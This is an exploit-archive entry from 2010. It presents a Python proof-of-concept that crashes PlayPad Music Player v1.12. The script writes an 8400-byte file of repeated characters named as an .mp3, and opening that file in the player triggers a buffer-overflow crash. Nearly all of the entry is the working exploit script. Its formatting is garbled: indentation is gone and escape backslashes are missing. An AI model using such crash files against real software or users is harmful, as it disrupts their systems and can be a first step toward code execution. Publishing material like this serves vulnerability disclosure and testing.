[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PlayPad Music Player v1.12 .mp3 Denial of Service Vulnerability
# Published : 2010-08-20
# Author : Praveen Darshanam
# Previous Title : Karaoke Video Creator Denial of Service Vulnerability
# Next Title : Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability
# Exploit Title: PlayPad Music Player v1.12 .mp3 File Processing BoF/Crash
# Date: 20th August, 2010
# Author: Praveen Darshanam
# Software Link:
http://software-files-l.cnet.com/s/software/11/36/36/00/playsetup.exe?e=1282332392&h=9edf959c2f8f5a185881921969d667b8&lop=link&ptype=1901&ontid=2139&siteId=4&edId=3&spi=5dd11a728135fb7ad93544f5b51ee29a&pid=11363600&psid=75176763&fileName=playsetup.exe
# Version: 1.12
# Tested on: Windows XP Pro. SP2
print "nnPlayPad Music Player v1.12 .mp3 File Processing BoF/Crash"
buff = "D" * 8400
try:
mp3file = open("ppmp_crash.mp3","w")
mp3file.write(buff)
mp3file.close()
print "[+] Successfully created MP3 Filen"
print "[+] Load this File to PlayPad Player, you can see a Crashn"
print "[+] Coded by Praveen Darshanamn"
except:
print "[+] Unable to Create File"